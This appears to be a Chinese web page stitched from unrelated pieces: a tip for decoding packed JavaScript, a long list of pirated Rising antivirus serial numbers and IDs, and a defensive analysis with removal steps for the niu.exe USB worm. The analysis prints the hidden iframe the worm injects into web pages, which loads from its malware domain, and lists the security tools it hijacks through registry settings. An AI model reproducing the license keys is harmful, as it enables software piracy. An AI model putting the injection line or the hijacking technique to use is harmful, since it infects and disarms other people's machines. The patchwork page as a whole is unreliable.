首先你的加密后的代码有误,无法执行,应将return(c35?String.fromCharCode(c+29):
修改为return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):
c和35之间的部分你没复制出来
这种加密的算法的解密方法很简单
<html><body>
<div id="test"></div>
<script type="text/javascript">
document.getElementById('test').innerHTML = 将需要破解的代码全部复制过来,注意你原来的代码不对,请通过替换先将上面说的那个错误改正
</script>
</body>
</html>
将上面的代码保存成html文件,打开此文件即可看到加密前的内容,由于你的问题解密后是广告语,所以不在此处给出,自己试一下
2009年最新免费瑞星2009序列号大全 (2009-01-14 12:35:35)标签:d200 s3 p90 qb k1 杀毒 免费 病毒 防护 it 分类:杂谈聊斋之IT
DR610M-SEHG85-MSVUS2-P9E200 ID:6AA1EU9NWG4A
8JSBKL-I4VRU5-CHF4S2-HQE200 ID:6A8DSAXPLF4P
GRS979-C6MR9R-B1W8SL-LWE200 ID:6AKTR19EHG4Q
s018l6-vp0a59-nm9rsf-kc5200 ID:4azlrc6jga4f
EK72D3-3K1QB8-PU7CRM-F1D200 ID:W2BDX2HW66TI
4P0SFP-H7073V-49RCRQ-K8E200 ID:W2VDSV6M2HX7
MI0TMS-5KG75M-QDDLS0-1VE200 ID:7AHRR6LPN34G
LDQ5RQ-LAE8MM-DALMRG-9PD200 ID:4HDP6HPCC245
2008-03-16更新正版瑞星2008单机版序列号
DRGT-P03EK7-608GSC-E1F200 8AS5167JL54R
Q0TM0T-M875G7-5I9ISF-SGF200 8AVTA97J7546
C0HTGG-S04F44-6P98SD-21F200 8ALJ1K7JT54W
7GS98V-QT6RA7-MF9USC-6HF200 8AXJA17JI54D
40LPGT-Q05E47-6890SC-61F200 8A3E1Z7JH547
5GVP8V-QC7M27-MB9MSC-B1F200 8ASCAQ7JS54T
L3401T-U8Q00F-7AE3SU-JHF200 8AJ9AM7JV542
CJ0TQ0-S4P768-6QEASV-H1F200 8AP5AV7JA54X
PGUMPT-M47DM7-5H9GSF-TGF200 8AUZAB7JQ54A
LHVG9V-UCFK2F-NBBMSF-B1F200 8AP6BI7JH54S
00JRGV-P04VK7-M09CSC-G1F200 8AI71P7JK544
PGT6PT-M471M7-5H9JSF-U0F200 8A9LAE7JW54T
B08F0P-RP23P6-6M8SSD-7HF200 8A1UB37J754S
10MA0V-P85IG7-M297SC-HHF200 8AFP167JW54S
B30F10-RPP3P8-6MEBSV-FHF200 8AQRAW7JZ54B
8J8VQP-R4R7ME-6HERSV-91F200 8A2MA77JR54S
807VGV-R01WK7-MG84SD-41F200 8AB5B67JP54W
0GCRPT-P436M7-618ISC-D1F200 8AT11M7JT54M
G1JIHV-T0CTKF-N0BCSF-G1F200 8A3ICZ7JM54G
QASMRW-EAMUMN-SIUTSD-STF200 8ABAX5QJM54M
PRR62W-V6MHGN-WHUWSD-TCF200 8AC8X3QJ5543
7ARQRV-9RMMEN-IEUVSE-2TF200 8A23XZQJ754J
7AUQRU-9RNEEN-AEUGSE-5TF200 8AEWXPQJT54U
1ATRRR-8AN6MM-I2UISE-TTF200 8A3YXRQJD54H
GHQ2QP-T4E8ME-71BQSF-PHF200 8AXWB67JS54K
GHPIQP-T4E4ME-71BRSF-Q1F200 8AY4BI7JE544
J1P31P-TPE0PE-76BSSF-NHF200 8AZVBH7JZ54F
G1NIHV-T0DTKF-N0B4SF-K1F200 8AAMC77J454G
HHMI9V-TCDKIF-N3B6SF-J1F200 8ABXCL7J254S
K1LGHT-U0DC4F-78B0SF-61F200 8A2RC17JK54M
CHHCQG-34CB6C-0QB9SC-12F200 8AKBC27JY54K
J1G31G-TPC0PC-76BBSF-WHF200 8A5AC57JV549
K1FGHV-U0BT4F-N8AKSF-T1F200 8ALWCP7JC54G
LHEG9V-UCBK2F-NBAMSF-S1F200 8A6SCJ7JP548
G1DIHT-T0BCKF-70AGSF-E1F200 8APSCH7JI54E
GHCIQT-T4B4MF-71AISF-D1F200 8A79CG7J354U
K1BGHV-U0AT4F-N8ATSF-P1F200 8ASZCT7J354V
NHB19V-UTAPAF-NFAUSF-MHF200 8A86C97JF54S
NHAH9V-UTAKAF-NFAVSF-N1F200 8ATWC47JF545
8H9EQP-24ABME-0HAQSC-92F200 8AWRC47JD548
后面8开始的是ID号
瑞星杀毒软件2007序列号:
SN:080K3M-02050U-G0PVSC-AJE200ID: 5A71LG9JEB4Z
瑞星个人防火墙2007序列号:
瑞星杀毒软件2007网络版序列号:
20服务器,60客户端 3PVQNT-5JP184-9R8IJB-1F9108
10服务器,14338客户端 WS1H3W-WUWUU9-JL1D3Q-SF9108
10服务器,100客户端 86CEWS-WR44SP-6DGDR4-DAF008
10服务器,50客户端 WS1H3W-PLWUU9-JL1D3Q-SF9108
24服务器,16736客户端 2RE9VM-WUC1QA-51MA0T-DR9108
115服务器,106客户端 P28FLA-L0VCQL-BB8NM7-HJA108
中小企业版序列号: 24服务器,16736客户端 2RE9VM-WUC1QA-51MA0T-DR9108
(其实就是这个序列号珍贵啊!)
瑞星杀毒软件2008序列号:
SN:T1BULQ-70AWDE-9P90SF-7TD200 ID:RB2NA22T
SN:twhgm4-n2tduh-5qj7rm-06d200 ID:4h476397qb4p
SN:92Q40U-R9M8P7-EIFUSA-PI5200ID:4hcph47tpb4x
SN:77PUHE-QPV6KB-ME6JS3-KM5200 ID:W15CF5MCFWRQ
SN:EK72D3-3K1QB8-PU7CRM-F1D200ID:W2BDX2HW66TI
SN:DTRVAG-SA6MAK-6SLNRN-ASD200ID:4HWKC868AB4X
瑞星个人防火墙2008序列号:
SN:T1BULQ-70AWDE-9P90SF-7TD200 ID:RB2NA22T
SN:VQ6RIK-FJ9NCL-3UV1S4-QCD200ID:4HAHFNXT7B4C
SN:T1BULQ-70AWDE-9P90SF-7TD200ID:RB2NA22T
SN:77PUHE-QPV6KB-ME6JS3-KM5200 ID:W28CYL3L84PR
SN:9G9V0Q-A92E86-AJCTRN-9RD200 ID:RCX89JYL
最新2008瑞星可用正版序列号
K27JCN-50HTS5-Q8EDSD-N55200 4AIU2W8NRA46
7p1632-1v09gp-gfrfs1-p75200 4a9vxq6sfa4h
vugp3l-nnc60u-dui3se-r55200 rcsmzkis
WI5DBD-WTHBAS-FWE6ST-WJ5200 4A8F7367MA4F
B4NN4K-AQ5UQ5-2M1K6U-LJ4200 RBSYQXHJ
0QGUAU-P6C7AN-E1P9S8-35E200 7AZDAI8B6H4Z
0GM0QA-845G6A-I1APSD-80E200 7AA91Z7ZBH4P
M2B7QU-DGIQVF-BCF9S9-97E200 7A2AY6NTKH4X
cj415j-b4q09c-rqdhsn-9be200 7awzesiveh4d
I8EURA-CI3NEI-J4TCS8-EEE200 7APN5JPPA44H
NBDH7T-LRSC9W-5EVNSQ-GME200 6ANMI9H1NF4T
8BD3HW-R2S8TF-VGWASI-H0E200 6A25THTRZ34R
3PU8KQ-8V7A56-A7QRS4-HCE200 6ADS649FFF49
us9k4h-werd14-fsr1sa-ime200 7aeu9fv7w44q
b3kivl-ipu4nl-cmbis4-lue200 7atbst6ih44g
4ql75p-h6d9qe-49pls4-spe200 7arjj6u8fh4i
N3JKLN-5PTU5D-QEABSB-V3E200 7arpq17t744i
T39NT5-W0RDW1-FPDES1-09D200 5APK5A2G7B49
N6AWEQ-DQINSM-BE7SS9-16D200 4AHM9AUNT141
4JU2DM-H4W8JD-K9B6SQ-21D200 5ARLJJ1AJC4R
1tibgg-pf4it4-63m3rn-5cd200 6aul4dnaie44
A6MB35-RHLIPQ-EK6SSA-6HD200 4AF7GBE1WB4P
11EGH7-88BK49-R2E5SB-74D200 5A5YVJRE1C4S
u0skq2-n86u68-lrdcrl-7td200 5apkcvtb4c4a
VH8C9R-7KA32E-HU9DS3-D4D200 5AAMCIK39B47
05G3ES-P1C0JM-V04WS2-FSD200 6BH7AU1JBE48
71GF4S-QPC3Q6-VE8RSC-IGD200 5ADT7UGK1B4T
1BR2VD-0AVGNJ-82Q0S4-JRD200 5ADWUDBVF241
QJQE00-6CVBG0-1JBFSA-KCD200 5ANZE67Y5B4K
FLP7FE-BUE1SS-IW0WS9-KUD200 4ARUKU1QN144
DADGM1-3AJC5G-8RP0S9-M1D200 5A3H3D4BFC4P
hb21ir-kapgcm-l2sdsf-mud200 5amdp4mqbc4m
mlj9an-ulcral-wd4nsc-nnd200 6ama4k8mhe4w
B4NN4K-AQ5UQ5-2M1K6U-LJ4200 RBSYQXHJ
IC8TD4-TJ2739-74HMR6-NW4200 RC2EAUH9
RD7PKG-EJ9VD4-3KJE06-SW4200 H2A7T5VG
SK72BG-MU1PIT-5N3ERM-R1D200 4AENBBPMR141
S8PV67-MR67HH-UMUAS5-R3D200 5ATJG9BBFC45
ESMBG4-BMUIK1-2UVDNV-S84200 HCIV29P2
WFB77A-FSRQHR-JVMCPK-TS4200 HB9PSB7C
S7V47D-VQWH9S-FM76MT-VN4200 HBEMK35A
R9R6F7-MIEHJQ-UKW9RT-SSD200 5AVIMX6Z8B4H
8BLCEN-A2UB3L-RGSNS4-TAD200 5AY59HFZYB4S
9Q5CV9-RE9B7I-EJQIS9-U1D200 5A4GY72MWB4J
LIJM56-5CKUH9-HBETS9-WPD200 5ADCW6QITB48
瑞星杀毒软件2006/2007下载版序列号
SN:T1BULQ-70AWDE-9P90SF-7TD200 ID:RB2NA22T
SN:twhgm4-n2tduh-5qj7rm-06d200 ID:4h476397qb4p
SN:92Q40U-R9M8P7-EIFUSA-PI5200 ID:4hcph47tpb4x
SN:77PUHE-QPV6KB-ME6JS3-KM5200 ID:W15CF5MCFWRQ
SN:EK72D3-3K1QB8-PU7CRM-F1D200 ID:W2BDX2HW66TI
SN:DTRVAG-SA6MAK-6SLNRN-ASD200 ID:4HWKC868AB4X
瑞星个人防火墙2006/2007序列号
SN:T1BULQ-70AWDE-9P90SF-7TD200 ID:RB2NA22T
SN:VQ6RIK-FJ9NCL-3UV1S4-QCD200 ID:4HAHFNXT7B4C
SN:T1BULQ-70AWDE-9P90SF-7TD200 ID:RB2NA22T
SN:77PUHE-QPV6KB-ME6JS3-KM5200 ID:W28CYL3L84PR
SN:9G9V0Q-A92E86-AJCTRN-9RD200 ID:RCX89JYL
SN:V5V0WL-NGFHWU-DT2VRM-N45200 ID:W15CV5M3GF6Q
SN:080K3M-02050U-G0PVSC-AJE200 ID:6A94GZSK6F4R
瑞星杀毒软件2007和瑞星个人防火墙2007的序列号和ID
序列号:R40G6Q-6H041M-9K7HRK-KJD200 ID:6AMQCR3MJE4X
序列号:MI0TMS-5KG75M-QDDLS0-1VE200 ID:7AHRR6LPN34G
序列号:CSA5V1-S7RJNG-EQV4S6-G8E200 ID:U2MZUAJ6QFVR
序列号:KSILHN-57TKKD-Q9VCS5-KLE200 ID:W2NDV88L88BU
序列号:4QH7A6 H6C9RH K9PSSC SUD200 ID:5ATRBGE53B4L
序列号:vusbrc-fmes6j-3uifs6-pt5200 ID:w2pc4vrzfz4d 光盘版(正版)
序列号:2R0EMP-GMG3LM-45RARH-8RD200 ID:5AI39QXQ224A 下载版(正版)
序列号:0IPVTW-P5M5F7-V1D2RM-N2E200 ID:U24ZBZ5817HA
瑞星杀毒软件网络版序列号
20服务器,60客户端 3PVQNT-5JP184-9R8IJB-1F9108
10服务器,14338客户端 WS1H3W-WUWUU9-JL1D3Q-SF9108
10服务器,100客户端 86CEWS-WR44SP-6DGDR4-DAF008
10服务器,50客户端 WS1H3W-PLWUU9-JL1D3Q-SF9108
24服务器,16736客户端 2RE9VM-WUC1QA-51MA0T-DR9108
115服务器,106客户端 P28FLA-L0VCQL-BB8NM7-HJA108
------------------------------------------------------------------------
瑞星杀毒软件2005序列号:RIUEKR-EKNBL6-JLE9S0-9QD200对应ID:5AZHHTBBAB48
VUSBRC-FMES6J-3UIFS6-PT5200 or 52LDJG-Q9LBCT-6ACQS2-R35200
TV3MI2-N6GTCG-LQL8S5-7L5200 升级ID: 4AJRY64DNA4G
可在线升级的瑞星序列号(供参考)
序列号:52LDJG-Q9LBCT-6ACQ52-R35200 授权ID:RCHVDD9T
序列号:EWUVP3-3NWFMO-PUMFS2-PT5200 授权ID:RCHVDD9T
序列号: JUQVN2 CWEFLP J7JAC3 Q23200 授权ID:RCHVEPWV
序列号: HW5P8T-4FQE27-13N3SQ-IT5200 授权ID:RCHVE6RN
----------------------更多瑞星2005杀毒个人版安装序列号------------------
SN:TLHJP5-N4CD61-DQ7GRP-AMD200 ID:W2R2Q8T9LN2C
SN:NNRJ4Q-UTVL16-FF60S5-UJ5200 ID:任意
W13KIE-NP8U4J-LV82S3-VH9400 QTT8R8-VA73VI-7JGKS3-CN5200
IRTG70-CNN5QP-35WQS1-IT5200 U0I26A-W84GHI-NR8KSB-SU9300
U0I26A-W84GHI-NR8KSB-SU4900 W13KIE-NP8U4J-LV82S3-VH1990
W13KIE-NP8U4J-LV82S3-VH5200 77PUHE-QPV6KB-ME6JS3-KM5200
U0I26A-W84GHI-NR8KSB-SU4300 HNTQPT-4AWW67-13718L-HC4200
W13KIE-NP8U4J-LV82S3-VH6500 W13KIE-NP8U4J-LV82S3-VH1194
U0I26A-W84GHI-NR8KSB-SU2800 JUQVN2-CWEFLP-J7JAC3-Q232O0
W13KIE-NP8U4J-LV82S3-VH1199 W13KIE-NP8U4J-LV82S3-VH9500
U0I26A-W84GHI-NR8KSB-SU3800 U0I26A-W84GHI-NR8KSB-SU9400
W13KIE-NP8U4J-LV82S3-VH6800 52LDJG-Q9LBCT-6ACQS2-R30400
52LDJG-Q9LBCT-6ACQS2-R39600 W13KIE-NP8U4J-LV82S3-VH0990
U0I26A-W84GHI-NR8KSB-SU4300 W13KIE-NP8U4J-LV82S3-VH1690
W13KIE-NP8U4J-LV82S3-VH1190 W13KIE-NP8U4J-LV82S3-VH7900
ID:RCEXBH76 RCEXARP9 RCVUALMS RCHVH5CV
--------------------更多瑞星2005杀毒网络版安装序列号-------------------
3PVQNT-5JP184-9R8IJB-1F9108
WS1H3W-WUWUU9-JL1D3Q-SF9108
86CEWS-WR44SP-6DGDR4-DAF008
WS1H3W-PLWUU9-JL1D3Q-SF9108
WS1H3W-wuWUU9-JL1D3Q-SF9108
2RE9VM-WUC1QA-51MA0T-DR9108
P28FLA-L0VCQL-BB8NM7-HJA108
-----------------------瑞星个人防火墙 2005版序列号------------------------
SN:36RDFV-PQMJ3W-M65EGV-RN4200 ID: 任意
瑞星个人防火墙下载版
序列号:9G9V0Q-A92E86-AJCTRN-9RD200
升级ID:RCX89JYL
序列号77PUHE-QPV6KB-ME6JS3-KM5200 ID(任意)
序列号:LT4FC3-UF13S0-WBMMS1-U9D200
序列号:9G9V0Q-A92E86-AJCTRN-9RD200
ID:RCESAUW4
ID:F1CMIFNA
瑞星2006下载版 三年升级充列号
杀毒软件2006 安装序列号及用户ID
序列号: E71DBM-SQPAIU-MT06S5-QID200
用户ID: 4HAWMLBCR24J
瑞星2005序列号及ID
52LDJG-Q9LBCT-6ACQS2-R35200
ID:4AJRY64DNA4GSvM+T
U0I26A-W84GHI-NR8KSB-SU9600 ID:RCVUL38G
52LDJG-Q9LBCT-6ACQS2-R30500 ID:RCEXBGXF
U0I26A-W84GHI-NR8KSB-SU2700 ID:RCHVHSD5
0HM282-5BC8d3-U5MMd1-I20000 ID:RBFJDE8H
RIUEKR-EKNBL6-JLE9S0-9QD200 ID:TA26GFH8
36RDFV-PQMJ3W-M65EGV-RN4200 ID:4AJRY64DNA4G
LKFN4I-U83T14-NB3ARN-13D200 ID:4H9T4551XB4G
WIFBQF-WTJRVB-WWD0SQ-D05200 ID:4AN34IEGRA4A
瑞星个人防火墙下载版
序列号:9G9V0Q-A92E86-AJCTRN-9RD200
升级ID:RCX89JYL
序列号77PUHE-QPV6KB-ME6JS3-KM5200 ID(任意)
序列号:LT4FC3-UF13S0-WBMMS1-U9D200
序列号:9G9V0Q-A92E86-AJCTRN-9RD200
ID:RCESAUW4
ID:F1CMIFNA
瑞星正版终身升级CD-KEY
CD-KEY: RCQJ1KBI
正版瑞星序列号和ID
RCESAUW4
HNTQPT-4AWW67-13718L-HC4200
F1CMIFNA
RIUEKR-EKNBL6-J5E9XX-9QDI04
SBS55XYP
RIUEKR-EKNBL6-I5E9MG-9QDZ04
SB71SQ6W
05VU71-04FE9P-802MRU-DQ5200
RCESC6KG
W13KIE-NP8U4J-LV82S3-VH1192
SBQMACN9
52LDJG-Q9LBCT-6ACQ52-R35200
OBZ6UBUA
52LDJG-Q9LBCT-7ACQS2-R38300
RCHVABRE
RIUEKR-EKNBL6-JLE9TO-9QDZ04
CA2MSL8Q
W13KIE-NP8U4J-LV82S3-VH1192
RCHVBBP1
U0I26A-W84GHI-NR8KSB-SU9500
K1JYINE8
W13KIE-NP8U4J-LV82S3-VH6990
注册码:WIFBQF-WTJRVB-WWD0SQ-D05200
ID:4AN34IEGRA4A
8KVCFE-I57J3S-KH6SRV-B2D200
6A7WQ3FAXE41
序列号:RIUEKR-EKNBL6-JLE950-9QD200
用户ID:4AJRY64DNA4G
SN:R240UA-VGH07A-NK9RS3-IPD200 ID:5ASYTCUYCC4I
SN:JQ1UBP-TV8FAV-77V4S9-9VD200 ID:5AT4S856SB4N
SN:7IM2QA-1TLGMA-GFEHSJ-N4D200 ID:5AT694E3TB43
SN:N345K2-UPQ1D0-NEC1S4-QD5200 ID:4AGLVH3WKA4N
SN:8PD2IH-I638KK-CHRC88-565200 ID:4AWKZ3DXNA4P
SN:SI7BTD-MTHRW3-DN8KS7-0FD200 ID:5A15ETA2DC4L
SN:0R3FW0-P6GSWP-61QKS4-S3D200 ID:5A2D8VZYDC46
SN:585SIB-9A1ETI-RASMSD-AVD200 ID:5A2WWT1GMB4L
SN:JALI7T-4RLCHW-16VNS5-42D200 ID:5A4A1VZHWB4M
SN:RHNF85-EKDSR1-BLERS8-7MD200 ID:5A79JL39YC4Q
SN:MBTERL-UIW3ML-FCRIS3-H5D200 ID:5ALDJIMNIC4X
SN:KRAHNU-56IKDW-99W9S1-1AD200 ID:5AQ5XDZH9B4X
SN:4HA31G-H4AGPC-49F7SF-4CD200 ID:5AQA559VGC48
SN:M3RSQJ-DGVMVC-SCC9SP-QCD200 ID:5AS3RE9GCB48
SN:19G0BS-PAC02V-V2VLSB-F6D200 ID:5AS3YB5TTC4J
SN:J1BG47-CPAT11-S69AS2-UFD200 ID:5AWP5MCG5B4B
SN:F32H9G-JPPKAC-4VDVSS-6TD200 ID:5AQMP82IDB4Z
SN:TJ1A8E-F4PAI3-JQBGSA-BKD200 ID:5AKRZATXWC4F
文件名称:niu.exe文件大小:30625 bytes
AV命名:Virus.Win32.AutoRun.of (Kaspersky)
加壳方式:FSG
编写语言:Delphi
病毒类型:U盘病毒\下载者
文件MD5:e9612843c037fe7b62ded850bf4689c1
传播方式:U盘等移动介质\网页漏洞。
行为分析:
1、释放病毒副本:
%Systemroot%\system32\crsss.exe 30625 字节(注意区别,不是系统文件!)
并查找可用的磁盘,在其目录生成:NIu.exe和Autorun.inf。
2、释放P处理,开启自动播放?
net start shellHWDetection
3、连接60.175.150.1**(安徽省滁州市 电信IDC机房)下载木马。
下了一大堆。。。:
http://*.1030829.com/down.txt
盗号木马品种有:热血江湖\诛仙\完美世界\大话西游\梦幻西游\机战
还带有ARP病毒。。。
4、尝试修改IE主页,不过测试时并未实现,更新地址连接:
http://*.1030829.com/suoding.txt
看了下,是百度的。
5、释放P处理,尝试写入注册表IFEO键值,不过测试时并未实现。。。
如果成功的话,以下进程会被劫持:
REG.exe
360rpt.exe
360Safe.exe
360tray.exe
adam.exe
AgentSvr.exe
AppSvc32.exe
AST.exe
autoruns.exe
avgrssvc.exe
AvMonitor.exe
avp.exe
CCenter.exe
ccSvcHst.exe
FileDsty.exe
HijackThis.exe
FTCleanerShell.exe
IceSword.exe
iparmo.exe
Iparmor.exe
isPwdSvc.exe
kabaload.exe
KASMain.exe
KASTask.exe
KAV32.exe
KAVDX.exe
KAVPFW.exe
KAVSetup.exe
KAVStart.exe
KISLnchr.exe
KMailMon.exe
KMFilter.exe
KPFW32.exe
KPFW32X.exe
KPFWSvc.exe
KRegEx.exe
KsLoader.exe
KvDetect.exe
KvfwMcl.exe
kvol.exe
kvolself.exe
KVSrvXP.exe
kvupload.exe
kvwsc.exe
KWatch.exe
KWatch9x.exe
KWatchX.exe
loaddll.exe
MagicSet.exe
mcconsol.exe
mmqczj.exe
mmsk.exe
NAVSetup.exe
PFW.exe
PFWLiveUpdate.exe
QHSET.exe
Ras.exe
Rav.exe
RavMon.exe
RavMonD.exe
SysSafe.exe
TrojanDetector.exe
symlcsvc.exe
SREng.exe
SmartUp.exe
shcfg32.exe
scan32.exe
safelive.exe
runiep.exe
Rsaupd.exe
RsAgent.exe
rfwsrv.exe
RfwMain.exe
rfwcfg.exe
RegClean.exe
rfwProxy.exe
RavTask.exe
RavStub.exe
Trojanwall.exe
UIHost.exe
UmxAgent.exe
UmxAttachment.exe
UmxCfg.exe
UmxFwHlp.exe
UmxPol.exe
UpLive.EXE.exe
WoptiClean.exe
zxsweep.exe
regedit.exe
msconfig.exe
mmc.exe
taskmgr.exe
6、尝试关闭窗口的一些“敏感字”,连接http://*.1030829.com/guanjian.txt更新列表
保存至%Systemroot%\system32\test1.txt。
现有列表:
木马
病毒
360
瑞星
卡吧
金山
毒霸
江名(作者自己打错了,汗)
可能导致一些程序或浏览的网页会被关闭。
7、遍历磁盘,查找*htm、INDEX.PHP、DEFAULT.PHP、CONN.ASP等网页文件,插入一段JS代码:
{IfrAmE src=http://www.1030829.com/*.htm width=0 height=0}{/IfrAmE}
8、查找硬盘文件,有遇到*.GHO的则删除。
可能导致无法使用GHOST还原。
9、释放一个P处理,尝试把crsss.exe写入注册表启动项,不过还是没有实现``=。=
10、尝试修改注册表,使“系统显示隐藏文件功能失效”。使该功能选项成:
禽兽尚有一丝怜悯,我不是禽兽,所以我没有怜悯。
测试时候仍然没有实现。。
并试图删除安全模式一些键值,也没有成功。
11、还是修改注册表,禁用系统自动更新和防火墙。
键值:NoAutoUpdate与EnableFirewall。
12、每几毫秒为周期访问系统可用的磁盘,如发现NIu.exe和Autorun.inf不在则重写。
同时也实现了U盘感染。
解决方法:
1、http://free.ys168.com/?gudugengkekao下载:
图片点击可在新窗口打开查看修复IFEO之XP系统专用.rar 72KB
图片点击可在新窗口打开查看sreng2.5.zip 780KB
图片点击可在新窗口打开查看PowerRmv.com 101KB
图片点击可在新窗口打开查看显示隐藏文件.reg 9KB
2、断开网络,关闭不需要的进程。以下步骤要按顺序。
3、重启电脑,按F8进入安全模式,如果进不了的话,就正常模式吧!
4、打开任务管理器,如果打开不的话,运行那个“修改IFEO之XP系统专用”。
5、打开任务管理器,关闭crsss.exe进程。
6、打开PowerRmv,选上抑制杀灭对象再次生成,填入下面路径:(注意不要包含空隔)
C:\autorun.inf
C:\niu.exe
D:\autorun.inf
D:\niu.exe
E:\autorun.inf
E:\niu.exe
F:\autorun.inf
F:\niu.exe
X:\autorun.inf
X:\niu.exe
C:\Windows\system32\crsss.exe
X为移动盘.
好了,主体都消灭了,还有木马群,还是使用PowerRmv,继续填入,一次一个:
嫌麻烦的去下载Xdelbox。把下列路径导入。
C:\Program Files\Internet Explorer\PLUGINS\SysWin64.Jmp
C:\Program Files\Internet Explorer\PLUGINS\SysWin74.Jmp
C:\Program Files\Internet Explorer\PLUGINS\WinSys64.Sys
C:\Program Files\Internet Explorer\PLUGINS\WinSys74.Sys
C:\Program Files\winp\actv.ini
C:\Program Files\winp\code.dll
C:\Program Files\winp\lexi.lex
C:\Program Files\winp\play.dll
C:\Program Files\winp\snet.dll
C:\Program Files\winp\stdi.ini
C:\Program Files\winp\stdl.ini
C:\Program Files\winp\stub.dll
C:\Program Files\winp\upme.ini
C:\Program Files\winp\vote.dll
C:\Windows\upxdnd.exe
C:\Windows\Fonts\ardaase.fon
C:\Windows\Fonts\armease.fon
C:\Windows\Fonts\chqiaur.fon
C:\Windows\Fonts\chreaur.fon
C:\Windows\Fonts\chtiaur.fon
C:\Windows\Fonts\enweafx.fon
C:\Windows\Fonts\gejiand.fon
C:\Windows\Fonts\msguasd.fon
C:\Windows\Fonts\mszhasd.fon
C:\Windows\system32\0svchsot.exe
C:\Windows\system32\13temp.exe
C:\Windows\system32\17temp.exe
C:\Windows\system32\18temp.exe
C:\Windows\system32\19temp.exe
C:\Windows\system32\1svchsot.exe
C:\Windows\system32\21temp.exe
C:\Windows\system32\2svchsot.exe
C:\Windows\system32\4temp.exe
C:\Windows\system32\8kJk1g.dll
C:\Windows\system32\Autorun.inf
C:\Windows\system32\avpcq.dll
C:\Windows\system32\avpdj.dll
C:\Windows\system32\avpms.dll
C:\Windows\system32\avwgain.dll
C:\Windows\system32\avwgcmn.dll
C:\Windows\system32\avwgcst.exe
C:\Windows\system32\avzxain.dll
C:\Windows\system32\avzxbmn.dll
C:\Windows\system32\avzxbst.exe
C:\Windows\system32\c.txtC:\Windows\system32\d.txt
C:\Windows\system32\dpserio1.dll
C:\Windows\system32\h1.dll
C:\Windows\system32\jshelp.exe
C:\Windows\system32\jsshow.dll
C:\Windows\system32\kawdacs.dll
C:\Windows\system32\kawdbaz.exe
C:\Windows\system32\kawdbzy.dll
C:\Windows\system32\kvdxacf.dll
C:\Windows\system32\kvdxcis.exe
C:\Windows\system32\kvdxcma.dll
C:\Windows\system32\kvmxacf.dll
C:\Windows\system32\kvmxdis.exe
C:\Windows\system32\kvmxdma.dll
C:\Windows\system32\msavp.dll
C:\Windows\system32\mscomm.dll
C:\Windows\system32\nz4iek.dll
C:\Windows\system32\playasp.exe
C:\Windows\system32\raqjani.dll
C:\Windows\system32\raqjapi.dll
C:\Windows\system32\raqjatl.exe
C:\Windows\system32\rarjani.dll
C:\Windows\system32\rarjbpi.dll
C:\Windows\system32\rarjbtl.exe
C:\Windows\system32\ratbani.dll
C:\Windows\system32\ratbdpi.dll
C:\Windows\system32\ratbdtl.exe
C:\Windows\system32\rsjzafg.dll
C:\Windows\system32\rsjzbpm.dll
C:\Windows\system32\rsjzbsp.exe
C:\Windows\system32\test1.txt
C:\Windows\system32\upxdnd.dll
C:\Windows\system32\wxpSetup170.exe
C:\Windows\system32\xyupri0.dll
C:\Windows\system32\drivers\486who07g.sys
C:\Windows\system32\drivers\jshelp.sys
C:\Windows\system32\drivers\jsshow.drv
C:\Windows\system32\drivers\jsshow.sys
C:\Windows\system32\drivers\nnf5v.sys
C:\Windows\system32\drivers\scvhost.exe
C:\Windows\system32\drivers\svchost.exe
C:\Windows\system32\wbem\mopsll32.dll
6、重启系统,打开SREng,删除:
注册表
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
{upxdnd}{C:\winnt\upxdnd.exe} []
{KVP}{C:\winnt\system32\drivers\svchost.exe} []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
ShellExecuteHooks]
{{4D47B341-43DF-4563-753F-345FFA3157D4}}{C:\winnt\system32\kvmxdma.dll} []
{{3C87A354-ABC3-DEDE-FF33-3213FD7447C3}}{C:\winnt\system32\kvdxcma.dll} []
{{3A1247C1-53DA-FF43-ABD3-345F323A48D3}}{C:\winnt\system32\avwgcmn.dll} []
{{46650011-3344-6688-4899-345FABCD1564}}{C:\winnt\system32\ratbdpi.dll} []
{{14783410-4F90-34A0-7820-3230ACD05F41}}{C:\winnt\system32\raqjapi.dll} []
{{22FAACDE-34DA-CCD4-AB4D-DA34485A3422}}{C:\winnt\system32\rsjzbpm.dll} []
{{2859245F-345D-BC13-AC4F-145D47DA34F2}}{C:\winnt\system32\avzxbmn.dll} []
{{28907901-1416-3389-9981-372178569982}}{C:\winnt\system32\kawdbzy.dll} []
{{2598FF45-DA60-F48A-BC43-10AC47853D52}}{C:\winnt\system32\rarjbpi.dll} []
{{E3F426F6-8634-42A5-A29E-BC694A88FB7D}}{C:\winnt\system32\xyupri0.dll} []
{{1AB09B3F-A6D0-4B55-B87D-264934EBEAED}}{C:\Program Files\Internet Explorer\PLUGINS\WinSys74.Sys} []
{{5D83AD9C-3BFC-43F5-979D-2904DBC54A8E}}{C:\Program Files\Internet Explorer\PLUGINS\WinSys64.Sys} []
服务:
[Windows svcs RunThem / svcs][Stopped/Auto Start]
{C:\winnt\System32\svchost.exe -k netsvcs--}C:\PROGRA~1\winp\snet.dll}{}
[ServiceJsHelp / ServiceJsHelp][Running/Auto Start]
{C:\winnt\system32\playasp.exe}{}
驱动:
[nnf5v / nnf5v][Running/Auto Start]
{\??\C:\winnt\system32\drivers\nnf5v.sys}{N/A}
[486who07g / 486who07g][Running/Boot Start]
{\SystemRoot\System32\DRIVERS\486who07g.sys}{N/A}
(可能名字不一样。)
7、SREng,编辑注册表,注意不是删除:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
{shell}{Explorer.exe jshelp.exe} []
这个SRENG会自动修复,如果没有修复的话,把后面jshelp.exe去掉,成:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
{shell}{Explorer.exe} []
还有这个:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
{AppInit_DLLs}{rarjbpi.dll} []
置空,成:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
{AppInit_DLLs}{} []
8、把下载的工具导入,修复显示隐藏项。如果安全模式被破坏的,用SRENG修复``
9、还有那些被插代码的网页,去我网盘下载清除:
iframekill.rar 212KB
用法很简单,就不费话了。
10、如果防火墙和自动更新被禁用了的话,打开注册表,删除:
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU下的:
NoAutoUpdate和AUOptions键值。
